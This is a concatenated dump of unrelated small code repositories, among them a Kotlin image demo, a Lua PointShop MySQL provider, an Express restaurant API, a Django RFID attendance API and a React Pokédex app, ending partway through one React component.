"https://i.ibb.co/m893PcP/bmw-street-1280x720.jpg"
),
CarImage(
6,
RequestType.PICASSO,
"https://i.ibb.co/tqZb2Zk/bmw-inside-1-1280x720.jpg"
),
CarImage(
7,
RequestType.PICASSO,
"https://i.ibb.co/y8Tr1bQ/bmw-inside-2-1280x720.jpg"
),
CarImage(
8,
RequestType.PICASSO,
"https://i.ibb.co/KWnW8m3/bmw-inside-3-1280x720.jpg"
),
CarImage(
9,
RequestType.PICASSO,
"https://i.ibb.co/FqzL2Sg/bmw-left-side-1280x720.jpg"
)
)
list.forEach {
it.title = "[1280X720] ${it.type.name}"
}
return list
}
fun fakeDataLow(): ArrayList<CarImage> {
val list = arrayListOf(
CarImage(
0,
RequestType.GLIDE,
"https://i.ibb.co/VWyDXNw/bmw-front-1-1024x576.jpg"
),
CarImage(
1,
RequestType.GLIDE,
"https://i.ibb.co/ZVsct0w/bmw-front-2-1024x576.jpg"
),
CarImage(
2,
RequestType.GLIDE,
"https://i.ibb.co/zJQQQ5R/bmw-front-left-1024x576.jpg"
),
CarImage(
3,
RequestType.GLIDE,
"https://i.ibb.co/L91xBZX/bmw-front-right-1024x576.jpg"
),
CarImage(
4,
RequestType.GLIDE,
"https://i.ibb.co/TqzgMDp/bmw-inside-1-1024x576.jpg"
),
CarImage(
5,
RequestType.PICASSO,
"https://i.ibb.co/Z1KTBfx/bmw-inside-2-1024x576.jpg"
),
CarImage(
6,
RequestType.PICASSO,
"https://i.ibb.co/tLdpw4x/bmw-inside-3-1024x576.jpg"
),
CarImage(
7,
RequestType.PICASSO,
"https://i.ibb.co/T4bcmJP/bmw-left-side-1024x576.jpg"
),
CarImage(
8,
RequestType.PICASSO,
"https://i.ibb.co/WFxhGhp/bmw-street-1024x576.jpg"
),
CarImage(
9,
RequestType.PICASSO,
"https://i.ibb.co/hYJCTck/bmw-wide-1024x576.jpg"
)
)
list.forEach {
it.title = "[1024X576] ${it.type.name}"
}
return list
}
}
|
40fe4c91064799156e481404868f47c1253fd5a3
|
[
"Markdown",
"Kotlin",
"Gradle"
] | 9
|
Kotlin
|
svlilyas/testImage
|
85095d87f525f5e0b70a90c640a791f52cb5edc7
|
b83884d8e5c7feabd944d8980555336768e13236
|
refs/heads/master
|
<repo_name>KazumasaNagae/test_nge<file_sep>/app/models/country.rb
class Country < ActiveRecord::Base
def many_or_few
if self.population > 1000
'many'
else
'few'
end
end
end
|
69c21fbe5fe9a46d54e40f9b6e56529b1ba875c6
|
[
"Ruby"
] | 1
|
Ruby
|
KazumasaNagae/test_nge
|
f94295d51496adc035afec2e864601adc6f89851
|
746183fc7fcd430f8a9a8425a12c62ec9afbc192
|
refs/heads/master
|
<repo_name>SpencerSharkey/pointshop-tmysql<file_sep>/lua/providers/tmysql.lua
--[[
PointShop tMySQL Adapter by <NAME>
Should work, and has verbose output.
Adapted from _Undefined's pointshop-mysql
Once configured, change PS.Config.DataProvider = 'pdata' to PS.Config.DataProvider = 'tmysql' in pointshop's sh_config.lua.
]]--
-- config, change these to match your setup
local mysql_hostname = 'localhost' -- Your MySQL server address.
local mysql_username = 'root' -- Your MySQL username.
local mysql_password = '' -- Your MySQL password.
local mysql_database = 'pointshop' -- Your MySQL database.
local mysql_port = 3306 -- Your MySQL port. Most likely is 3306.
-- end config, don't change anything below unless you know what you're doing
-- end config, don't change anything below unless you know what you're doing
require('tmysql4')
PROVIDER.Fallback = "pdata"
local db, err = tmysql.initialize(mysql_hostname, mysql_username, mysql_password, mysql_database, mysql_port)
if (err) then
print("Error connecting to MySQL:")
ErrorNoHalt(err)
else
function PROVIDER:GetData(ply, callback)
local qs = string.format("SELECT * FROM `pointshop_data` WHERE uniqueid='%s'", ply:UniqueID())
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-GetData] "..err) return end
if (#res < 1) then callback(0, {}) return end
local row = res[1]
print("[PSMySQL-GetData] "..ply:UniqueID())
callback(row.points or 0, util.JSONToTable(row.items or '{}'))
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:SetPoints(ply, points)
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '%s', '[]') ON DUPLICATE KEY UPDATE points = VALUES(points)", ply:UniqueID(), points or 0)
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-SetPoints] "..err) return end
print("[PSMySQL-SetPoints] "..ply:UniqueID().."="..points)
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:GivePoints(ply, points)
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '%s', '[]') ON DUPLICATE KEY UPDATE points = points + VALUES(points)", ply:UniqueID(), points or 0)
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-GivePoints] "..err) return end
print("[PSMySQL-GivePoints] "..ply:UniqueID().."+="..points)
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:TakePoints(ply, points)
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '%s', '[]') ON DUPLICATE KEY UPDATE points = points - VALUES(points)", ply:UniqueID(), points or 0)
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-TakePoints] "..err) return end
print("[PSMySQL-TakePoints] "..ply:UniqueID().."-="..points)
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:SaveItem(ply, item_id, data)
self:GiveItem(ply, item_id, data)
end
function PROVIDER:GiveItem(ply, item_id, data)
local tmp = table.Copy(ply.PS_Items)
tmp[item_id] = data
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '0', '%s') ON DUPLICATE KEY UPDATE items = VALUES(items)", ply:UniqueID(), tmysql.escape(util.TableToJSON(tmp)))
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-GiveItem] "..err) return end
print("[PSMySQL-GiveItem] "..ply:UniqueID().."="..item_id)
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:TakeItem(ply, item_id)
local tmp = table.Copy(ply.PS_Items)
tmp[item_id] = nil
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '0', '%s') ON DUPLICATE KEY UPDATE items = VALUES(items)", ply:UniqueID(), tmysql.escape(util.TableToJSON(tmp)))
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-TakeItem] "..err) return end
print("[PSMySQL-TakeItem] "..ply:UniqueID().."="..item_id)
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:SetData(ply, points, items)
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '%s', '%s') ON DUPLICATE KEY UPDATE points = VALUES(points), items = VALUES(items)", ply:UniqueID(), points or 0, tmysql.escape(util.TableToJSON(items)))
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-SetData] "..err) return end
print("[PSMySQL-SetData] "..ply:UniqueID())
end, QUERY_FLAG_ASSOC)
end
end
<file_sep>/README.md
pointshop-tmysql
================
MySQL adapter for PointShop that uses [tmysql4](https://code.google.com/p/blackawps-glua-modules/source/browse/#hg%2Fgm_tmysql4_boost%2FRelease) by Blackawps.
Install this folder as a separate addon. (Place entire `pointshop-tmysql` folder in `garrysmod/addons`)
MySQL providers for pointshop are useful if you want to share data across multiple servers, or store it for access from different applications such as a website or donation system.
tMySQL4 Installation
================
Get tmysql4 from [Blackawps's Google Code](https://code.google.com/p/blackawps-glua-modules/source/browse/#hg%2Fgm_tmysql4_boost%2FRelease)
It's Windows AND Linux compatible! Make sure you install the correct libraries.
You must place the libraries in `libs.rar` ([link](https://blackawps-glua-modules.googlecode.com/hg/gm_tmysql4_boost/Release/libs.rar)) next to your SRCDS executable located in the same folder the `garrysmod` folder is within your server installation folder.
You must also place either gm_tmysql4_win32.dll or gmsv_tmysql4_linux.dll in your `garrysmod/lua/bin` folder depending on your server's operating system. Obviously, `win32` for Windows and `linux` for linux operating systems.
Windows server users might also need to isntall the [Microsoft Visual C++ 2008 Redistributable Package](http://www.microsoft.com/en-us/download/details.aspx?id=29) for the module to operate properly. If you do not have it installed, the server will crash on startup. It package contains libraries tMySQL requires during runtime and will install them automatically for you.
Configuration
================
1. Execute the `pointshop.sql` on the database you are configuring for use with Pointshop. PhpMyAdmin or any other MySQL client application usually have an import feature.
2. Navigate to `lua/providers/tymsql.lua` within the addon folder and modify the MySQL connection information at the top of the file.
3. Edit Pointshop's `sh_config.lua`... Change `PS.Config.DataProvider = 'pdata'` to `PS.Config.DataProvider = 'tmysql'`
The MySQL server you are using must allow remote connections with the user provided. If you are using a web service like cPanel to manage your database, [here](http://www.liquidweb.com/kb/enable-remote-mysql-connections-in-cpanel/) is a helpful tutorial. If you're using a standalone MySQL server installation on a seperate server, [here](http://www.cyberciti.biz/tips/how-do-i-enable-remote-access-to-mysql-database-server.html) is tutorial that will help you.
Some game server providers provide MySQL databases with servers, talk to your support agents to get info on how to set them up if you do not already know how.
Credits
================
Adaptation by <NAME> (<EMAIL>)
Adapted from adamdburton/pointshop-mysql
|
ae5b43be25495d47ca23db61987654cf65506d60
|
[
"Markdown",
"Lua"
] | 2
|
Lua
|
SpencerSharkey/pointshop-tmysql
|
36b453598f07dfb9e803a7aabc5b01aa97506ed1
|
5c7eeb47b0bc4279603db35ae22f790c19db1f3a
|
refs/heads/master
|
<repo_name>EliezerJD/backRFID<file_sep>/rfid/models.py
from django.db import models
# Create your models here.
class rfid(models.Model):
codigo = models.IntegerField(null=False)
status = models.CharField(max_length=100, null=False)
idalumno = models.CharField(max_length=10, null=True)
def __str__(self):
return self.name
class Meta:
db_table = 'rfid'
<file_sep>/requirements.txt
Django==2.2.10
pytz==2019.3
sqlparse==0.3.0
django-cors-headers==2.2.1
<file_sep>/rfid/serializers.py
from rest_framework import serializers
from rfid.models import rfid
class RfidSerializer(serializers.ModelSerializer):
class Meta:
model = rfid
fields = ('__all__')
<file_sep>/alumno/urls.py
from django.urls import include, path, re_path
from rest_framework import routers
from alumno import views
from alumno import serializers
urlpatterns = [
re_path(r'^alumno/$', views.AlumnoList.as_view()),
re_path(r'^alumno/(?P<pk>\d+)$', views.AlumnoDetail.as_view()),
]
<file_sep>/rfid/migrations/0002_auto_20200326_0029.py
# Generated by Django 3.0.4 on 2020-03-26 00:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rfid', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='rfid',
name='idalumno',
field=models.CharField(max_length=10, null=True),
),
]
<file_sep>/alumno/models.py
from django.db import models
from django.utils import timezone
# Create your models here.
class alumno(models.Model):
nombre = models.CharField(max_length=100, null=False)
ap_pat = models.CharField(max_length=100, null=False)
ap_mat = models.CharField(max_length=100, null=False)
fecha = models.DateTimeField(default = timezone.now)
idrfid = models.CharField(max_length=10, null=True)
def __str__(self):
return self.name
class Meta:
db_table = 'alumno'
<file_sep>/rfid/urls.py
from django.urls import include, path, re_path
from rest_framework import routers
from rfid import views
from rfid import serializers
urlpatterns = [
re_path(r'^rfid/$', views.RfidList.as_view()),
re_path(r'^rfid/(?P<pk>\d+)$', views.RfidDetail.as_view()),
]
<file_sep>/alumno/views.py
from django.shortcuts import render
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import generics
from alumno.models import alumno
from alumno.serializers import AlumnoSerializer
# Create your views here.
class AlumnoList(APIView):
def get(self, request, format=None):
queryset = alumno.objects.all()
serializer = AlumnoSerializer(queryset, many=True, context = {'request':request})
return Response(serializer.data)
def post(self, request, format=None):
serializer = AlumnoSerializer(data= request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response (datas)
return Response(serializer.error_messages,status=status.HTTP_400_BAD_REQUEST)
class AlumnoDetail(APIView):
def get_object(self,pk):
try:
return alumno.objects.get(pk=pk)
except alumno.DoesNotExist:
raise Http404
def get(self, request,pk, format=None):
alumno = self.get_object(pk)
serializer = AlumnoSerializer(alumno)
return Response(serializer.data)
def put(self, request,pk, format=None):
alumno = self.get_object(pk)
serializer = AlumnoSerializer(alumno, data = request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
alumno = self.get_object(pk)
alumno.delete()
return Response('Eliminado')
<file_sep>/rfid/views.py
# Create your views here.
from django.shortcuts import render
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import generics
from rfid.models import rfid
from rfid.serializers import RfidSerializer
# Create your views here.
class RfidList(APIView):
def get(self, request, format=None):
queryset = rfid.objects.all()
serializer = RfidSerializer(queryset, many=True, context = {'request':request})
return Response(serializer.data)
def post(self, request, format=None):
serializer = RfidSerializer(data= request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response (datas)
return Response(serializer.error_messages,status=status.HTTP_400_BAD_REQUEST)
class RfidDetail(APIView):
def get_object(self,pk):
try:
return rfid.objects.get(pk=pk)
except rfid.DoesNotExist:
raise Http404
def get(self, request,pk, format=None):
rfid = self.get_object(pk)
serializer = RfidSerializer(rfid)
return Response(serializer.data)
def put(self, request,pk, format=None):
rfid = self.get_object(pk)
serializer = RfidSerializer(rfid, data = request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
rfid = self.get_object(pk)
rfid.delete()
return Response('Eliminado')
<file_sep>/asistencia/views.py
from django.shortcuts import render
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import generics
from asistencia.models import asistencia
from asistencia.serializers import AsistenciaSerializer
# Create your views here.
class AsistenciaList(APIView):
def get(self, request, format=None):
queryset = asistencia.objects.all()
serializer = AsistenciaSerializer(queryset, many=True, context = {'request':request})
return Response(serializer.data)
def post(self, request, format=None):
serializer = AsistenciaSerializer(data= request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response (datas)
return Response(serializer.error_messages,status=status.HTTP_400_BAD_REQUEST)
class AsistenciaDetail(APIView):
def get_object(self,pk):
try:
return asistencia.objects.get(pk=pk)
except asistencia.DoesNotExist:
raise Http404
def get(self, request,pk, format=None):
asistencia = self.get_object(pk)
serializer = AsistenciaSerializer(asistencia)
return Response(serializer.data)
def put(self, request,pk, format=None):
asistencia = self.get_object(pk)
serializer = AsistenciaSerializer(asistencia, data = request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
asistencia = self.get_object(pk)
asistencia.delete()
return Response('Eliminado')
<file_sep>/asistencia/models.py
from django.db import models
from django.utils import timezone
# Create your models here.
class asistencia(models.Model):
fecha = models.DateTimeField(default = timezone.now)
idalumno = models.CharField(max_length=10, null=False)
def __str__(self):
return self.name
class Meta:
db_table = 'asistencia'
<file_sep>/alumno/migrations/0002_auto_20200325_2348.py
# Generated by Django 3.0.4 on 2020-03-25 23:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('alumno', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='alumno',
name='idrfid',
field=models.CharField(max_length=10, null=True),
),
]
<file_sep>/asistencia/urls.py
from django.urls import include, path, re_path
from rest_framework import routers
from asistencia import views
from asistencia import serializers
urlpatterns = [
re_path(r'^asistencia/$', views.AsistenciaList.as_view()),
re_path(r'^asistencia/(?P<pk>\d+)$', views.AsistenciaDetail.as_view()),
]
|
d343d7e7a3300fdbb80d5aaf2d680f96703a9774
|
[
"Python",
"Text"
] | 13
|
Python
|
EliezerJD/backRFID
|
52646c87c47dc7fa789a1095dfa4f60adab2858e
|
a693c92a15a4b01aca008d22da9d6a2ca8f355fd
|
refs/heads/master
|
<repo_name>mesalvav/project3real<file_sep>/server/routes/dishRouter.js
const express = require('express');
const router = express.Router();
const Dish = require('../models/dishes')
const uploadCloud = require('../config/cloudinary-setup.js');
/* all dishes */
router.get('/', (req, res, next) => {
Dish.find().populate({path:'comments', model:'Comment', populate:{path:'author',model:'User'}})
.then( dishesList =>{
res.status(200).json(dishesList );
})
.catch(err =>{
console.log(err);
})
});
router.get('/:dishid', (req, res, next) => {
console.log(" "+ req.params.dishid);
Dish.findById(req.params.dishid).populate('comments')
.then( dishesx =>{
res.status(200).json(dishesx );
})
.catch(err =>{
console.log(err);
})
});
router.post('/uploadnewdish', uploadCloud.single('photo'), (req,res,next) => {
console.log('line 12 post upload: ' + JSON.stringify( req.body));
const {
name,
description,
category,
label,
price,
featured
} = req.body;
const image = req.file.url;
const newDish =
new Dish({name,
description,
image,
category,
label,
price,
featured});
newDish.save()
.then(dish =>{
res.status(200).json({ result: " saved & uploaded dish here"});
})
.catch(err => { console.log("err is " + err)})
})
module.exports = router;<file_sep>/client/src/shared/promotions.js
export const PROMOTIONS = [
{
id: 0,
name: '<NAME>',
image: '/assets/images/buffet.png',
label: 'New',
price: '8.97',
featured: true,
description: 'Many ingredients typically served in clay pots, from which guests pick their favorites to make their own tortillas. All for just $8.97 per person'
}
];<file_sep>/server/public/precache-manifest.eb206d3b6e7add6af399744082694c5b.js
self.__precacheManifest = (self.__precacheManifest || []).concat([
{
"revision": "c29be1e2f93c1837a0bc3412ede5d619",
"url": "/index.html"
},
{
"revision": "a82e70f69381d8daf5b7",
"url": "/static/css/2.57008913.chunk.css"
},
{
"revision": "2f2917ded4d254478459",
"url": "/static/css/main.fa30e90f.chunk.css"
},
{
"revision": "a82e70f69381d8daf5b7",
"url": "/static/js/2.6b1ed1db.chunk.js"
},
{
"revision": "2f2917ded4d254478459",
"url": "/static/js/main.4b0b797f.chunk.js"
},
{
"revision": "42ac5946195a7306e2a5",
"url": "/static/js/runtime~main.a8a9905a.js"
},
{
"revision": "674f50d287a8c48dc19ba404d20fe713",
"url": "/static/media/fontawesome-webfont.674f50d2.eot"
},
{
"revision": "912ec66d7572ff821749319396470bde",
"url": "/static/media/fontawesome-webfont.912ec66d.svg"
},
{
"revision": "af7ae505a9eed503f8b8e6982036873e",
"url": "/static/media/fontawesome-webfont.af7ae505.woff2"
},
{
"revision": "b06871f281fee6b241d60582ae9369b9",
"url": "/static/media/fontawesome-webfont.b06871f2.ttf"
},
{
"revision": "fee66e712a8a08eef5805a46892932ad",
"url": "/static/media/fontawesome-webfont.fee66e71.woff"
}
]);<file_sep>/server/routes/commentRouter.js
const express = require('express');
const router = express.Router();
const Comment = require('../models/comments');
const Dish = require('../models/dishes');
/* GET home page */
router.get('/:dishid', (req, res, next) => {
Dish.findById(req.params.dishid).populate('comments')
.then(dishx => {
res.status(200).json(dishx.comments );
})
.catch(err=>console.log(err))
});
router.post('/addcomment', (req, res, next) => {
const { rating , comment, author, dishid } = req.body;
Comment.create({rating: rating, comment: comment, author: author})
.then((commentx)=>{
Dish.findByIdAndUpdate(dishid, { $push:{comments: commentx._id}})
.then((response)=>{ res.json({response, commentx}) })
.catch(err=>{ res.json(err) });
})
.catch(err=>{ res.json(err) });
});
router.delete('/deletecomment/:commentid', (req, res, next) => {
// const { dishid, commentid } = req.body;
Comment.findOneAndRemove(req.params.commentid)
.then((response=>{
res.status(200).json(response);
}))
.catch(err=>console.log(err))
// Dish.findById(dishid)
// .then((dishx)=>{
// // const indexofdishx = dishx.comments.findIndex(commentid);
// let comms = [...dishx.comments];
// let filtered = comms.filter(ele=> ele._id.toString() === commentid );
// res.status(200).json({filtered, commentid});
// })
// .catch( err=>{ res.json(err) } );
})
router.post('/updatecomment', (req, res, next) => {
const { commentid, rating, comment } = req.body;
Comment.findByIdAndUpdate(commentid, {rating:rating, comment: comment})
.then((response=>{
res.status(200).json(response);
}))
.catch(err=>console.log(err))
})
module.exports = router;<file_sep>/client/src/services/commentService.js
import axios from 'axios';
// baseURL: 'http://localhost:5000/api/comments',
class CommentService {
constructor(){
let service = axios.create({
baseURL: `${process.env.REACT_APP_API_URL}/comments`,
withCredentials: true,
});
this.service = service;
}
addNewComment = (rating, comment, author, dishid)=> {
return this.service.post('/addcomment', {
rating: rating, comment: comment, author: author, dishid
})
.then(response => response.data)
.catch(err=>console.log(err))
}
// deleteComment = (dishid, commentid)=>{
// return this.service.post('deletecomment', {dishid,commentid })
// .then(response=>response.data)
// .catch(err=>{console.log(err)})
// }
deleteComment = (commentid)=>{
return this.service.delete('deletecomment/'+commentid)
.then(response=>response.data)
.catch(err=>{console.log(err)})
}
updateComment = (commentid, rating, comment)=>{
return this.service.post('updatecomment', {commentid, rating, comment})
.then(response=>response.data)
.catch(err=>console.log(err))
}
}
export default CommentService;<file_sep>/server/README.md
# back-end-restaurant
|
74a78d3dfa71614e443d21b187bf58cffa36bd41
|
[
"JavaScript",
"Markdown"
] | 6
|
JavaScript
|
mesalvav/project3real
|
b297055707c194eaa67e06ab6a7fd2292e9a9ee8
|
fb65abfb72e1c09e58eed6bc833b97a74d8413c2
|
refs/heads/master
|
<repo_name>jceballos29/poke-app<file_sep>/src/components/CardContainer.js
import React, { useEffect, useState } from "react";
import Card from "./Card";
import "../css/CardContainer.css";
function CardContainer({ pokemons }) {
const [renderLisnt, setRenderList] = useState([]);
useEffect(() => {
if (pokemons) {
setRenderList(
pokemons.map((pokemon, index) => <Card key={index} url={pokemon.url} />)
);
console.log(pokemons[0]);
}
}, [pokemons]);
return <div className="CardContainer">{renderLisnt}</div>;
}
export default CardContainer;
<file_sep>/src/components/Pokedex.js
import React, { useEffect, useState } from "react";
import TrainerCard from "./TrainerCard";
import "../css/PokeContainer.css";
import SearchBar from "./SearchBar";
import axios from "axios";
import Container from "./Container";
import { useAuth } from "../Context/AuthProvider";
function Pokedex() {
const { user } = useAuth();
const [types, setTypes] = useState([]);
const [name, setName] = useState("Ash");
const [gender, setGender] = useState("male");
useEffect(() => {
const getTypes = async () => {
axios
.get("https://pokeapi.co/api/v2/type")
.then((response) => setTypes(response.data.results))
};
getTypes();
}, []);
useEffect(() => {
if (user) {
setName(user.name);
setGender(user.gender);
}
}, [user]);
return (
<div className="PokeContainer">
<TrainerCard
gender={gender}
user={name}
id={Math.floor(Math.random() * (90000 - 10000) + 10000)}
/>
<SearchBar types={types} />
<Container />
</div>
);
}
export default Pokedex;
<file_sep>/src/components/PorfileItem.js
import React from "react";
function PorfileItem({ name, value }) {
return (
<div className="PorfileItem">
<p>{name}</p>
<p>{value}</p>
</div>
);
}
export default PorfileItem;
<file_sep>/src/components/Types.js
import React, { useEffect, useState } from "react";
import axios from "axios";
import "../css/Home.css";
import ButtonPage from "./ButtonPage";
import CardContainer from "./CardContainer";
import { useLocation } from "react-router-dom";
function Types() {
const { state } = useLocation();
const limit = 4;
const [pokemons, setPokemons] = useState(null);
const [pokemonsRenderList, setPokemonsRenderList] = useState([]);
const [page, setPage] = useState(0);
const [count, setCount] = useState(null);
const [start, setStart] = useState(0);
const [final, setFinal] = useState(limit);
const getPage = (page) => {
setPage(page);
};
useEffect(() => {
if (state) {
axios
.get(`https://pokeapi.co/api/v2/type/${state.type}`)
.then((response) => {
setPokemons(response.data.pokemon);
setCount(response.data.pokemon.length);
})
}
}, [state]);
useEffect(() => {
setStart(page * limit);
setFinal(page * limit + limit);
}, [page, limit]);
useEffect(() => {
if (pokemons) {
let list = [];
for (let i = start; i < final; i++) {
list.push(pokemons[i].pokemon);
}
setPokemonsRenderList(list);
}
}, [start, final, pokemons]);
return (
<div className="Pokedex">
<CardContainer pokemons={pokemonsRenderList} />
<ButtonPage top={Math.ceil(count / limit)} handlePage={getPage} />
</div>
);
}
export default Types;
<file_sep>/src/components/Home.js
import React, { useEffect, useState } from "react";
import axios from "axios";
import "../css/Home.css";
import ButtonPage from "./ButtonPage";
import CardContainer from "./CardContainer";
function Home() {
const [pokemons, setPokemons] = useState(null);
const [page, setPage] = useState(0);
const [count, setCount] = useState(null);
const [offset, setOffset] = useState(0);
const limit = 4;
const getPage = (page) => {
setPage(page);
};
useEffect(() => {
axios
.get(`https://pokeapi.co/api/v2/pokemon?offset=${offset}&limit=${limit}`)
.then((response) => {
setPokemons(response.data.results);
setCount(response.data.count);
})
}, [offset, limit]);
useEffect(() => {
setOffset(page * limit);
}, [page]);
return (
<div className="Pokedex">
<CardContainer pokemons={pokemons} />
<ButtonPage top={Math.ceil(count / limit)} handlePage={getPage} />
</div>
);
}
export default Home;
<file_sep>/src/components/SingIn.js
import React from "react";
import { useForm } from "react-hook-form";
import { useHistory } from "react-router-dom";
import { useAuth } from "../Context/AuthProvider";
import "../css/SignIn.css";
function SingIn() {
const auth = useAuth();
const history = useHistory();
const { register, handleSubmit } = useForm();
const onSubmit = (data) => {
auth.signIn(data);
history.push("/pokedex");
};
return (
<div className="SignIn">
<h1>The adventure is about to start.</h1>
<form onSubmit={handleSubmit(onSubmit)}>
<label>What's your name?</label>
<input
type="text"
placeholder="name"
{...register("name", { required: true })}
/>
<label>Choose the gender of your avatar</label>
<select {...register("gender", { required: true })}>
<option value="">Select...</option>
<option value="male">male</option>
<option value="female">female</option>
</select>
<button>Go!</button>
</form>
</div>
);
}
export default SingIn;
<file_sep>/src/components/Container.js
import React from "react";
import { Switch, useRouteMatch } from "react-router-dom";
import "../css/Container.css";
import { ProtectedRoute } from "../ProtectedRoute";
import Home from "./Home";
import Pokemon from "./Pokemon";
import Types from "./Types";
function Container() {
const { path } = useRouteMatch();
return (
<div className="Container">
<Switch>
<ProtectedRoute path={`${path}/pokemon/:name`}>
<Pokemon />
</ProtectedRoute>
<ProtectedRoute path={`${path}/pokemon/:id`}>
<Pokemon />
</ProtectedRoute>
<ProtectedRoute path={`${path}/:type`}>
<Types />
</ProtectedRoute>
<ProtectedRoute path={path}>
<Home />
</ProtectedRoute>
</Switch>
</div>
);
}
export default Container;
<file_sep>/README.md
# Poke App
_Aplicación en React que permite buscar pokemons, por tipo o por nombre, y visualizar sus caracteristicas_
## Despliegue 📦
_[Poke App](https://poke-app-rust.vercel.app/) - Desplegado con [vercerl.com](https://vercel.com)_
## Construido con 🛠️
* [ReactJS](https://reactjs.org/)
* [NodeJS](https://nodejs.org/)
* [React Router](https://www.npmjs.com/package/react-router-dom) - Rutas de navegación
* [React Hook Form](https://react-hook-form.com/) - Formularios
* [FontAwesome](https://fontawesome.com) - Íconos
* [Axios](https://www.npmjs.com/package/react-axios) - Peticiones a la API
## Autor ✒️
* **<NAME>** - *Desarrollador* - [jceballos29](https://github.com/jceballos29)
<file_sep>/src/Routes.js
import React from "react";
import { Route, Switch } from "react-router-dom";
import Pokedex from "./components/Pokedex";
import SingIn from "./components/SingIn";
import { ProtectedRoute } from "./ProtectedRoute";
function Routes() {
return (
<Switch>
<ProtectedRoute path="/pokedex">
<Pokedex />
</ProtectedRoute>
<Route path="/">
<SingIn />
</Route>
</Switch>
);
}
export default Routes;
<file_sep>/src/components/SearchBar.js
import React, { useEffect, useState } from "react";
import { useForm } from "react-hook-form";
import { useHistory } from "react-router-dom";
import "../css/SearchBar.css";
function SearchBar({ types }) {
const history = useHistory();
const [search, setSearch] = useState(true);
const [buttonName, setbuttonName] = useState("type");
const { register, handleSubmit, reset } = useForm();
const onSubmit = (data) => {
if (data.type) {
const type = data.type.split("-");
history.push(`/pokedex/${type[1]}`, {
type: type[0],
});
}
if (data.name) {;
history.push(`/pokedex/pokemon/${data.name}`, { name: data.name });
}
reset({ name: "" });
};
useEffect(() => {
if (search) setbuttonName("name");
else setbuttonName("type");
}, [search]);
const list = types.map((type, index) => (
<option key={index} value={`${index + 1}-${type.name}`}>
{type.name}
</option>
));
return (
<div className="SearchBar">
<div className="options">
<button
onClick={() => {
setSearch(!search);
reset({ name: "" });
}}
>
{buttonName}
</button>
</div>
<form className="form" onSubmit={handleSubmit(onSubmit)}>
{search ? (
<select className="select" {...register("type")}>
<option value="">Search by type of pokemon </option>
{list}
</select>
) : (
<input
type="text"
placeholder="name"
{...register("name", { required: true })}
/>
)}
<button type="submit">Search</button>
</form>
</div>
);
}
export default SearchBar;
<file_sep>/src/components/ButtonPage.js
import React, { useEffect, useState } from "react";
import "../css/ButtonPage.css";
function ButtonPage({ top, handlePage }) {
const [disabledPrevious, setDisabledPrevious] = useState(false);
const [disabledNext, setDisabledNext] = useState(false);
const [page, setPage] = useState(0);
useEffect(() => {
handlePage(page);
if (page === 0) {
setDisabledPrevious(true);
} else {
setDisabledPrevious(false);
}
if (page === top - 1) {
setDisabledNext(true);
} else {
setDisabledNext(false);
}
}, [page, top, handlePage]);
return (
<div className="ButtonPage">
<button
className="Previous"
disabled={disabledPrevious}
onClick={() => {
setPage(page - 1);
}}
>
Previous
</button>
<div className="Page">
<b>- {page + 1} -</b>
</div>
<button
className="Next"
disabled={disabledNext}
onClick={() => {
setPage(page + 1);
}}
>
Next
</button>
</div>
);
}
export default ButtonPage;
<file_sep>/src/ProtectedRoute.js
import { Redirect, Route } from "react-router-dom";
import { useAuth } from "./Context/AuthProvider";
export const ProtectedRoute = ({ children, ...props }) => {
const { user } = useAuth();
return user ? <Route {...props}> {children} </Route> : <Redirect to="/" />;
};
<file_sep>/src/components/Pokemon.js
import axios from "axios";
import React, { useEffect, useState } from "react";
import {
Switch,
useHistory,
useLocation,
useRouteMatch,
} from "react-router-dom";
import { FontAwesomeIcon } from "@fortawesome/react-fontawesome";
import {
faChevronLeft,
faChevronRight,
} from "@fortawesome/free-solid-svg-icons";
import "../css/Pokemon.css";
import Stat from "./Stat";
import Type from "./Type";
import { ProtectedRoute } from "../ProtectedRoute";
function Pokemon() {
const { state } = useLocation();
const history = useHistory();
const { path, url } = useRouteMatch();
const [pokemon, setPokemon] = useState(null);
const [name, setName] = useState(null);
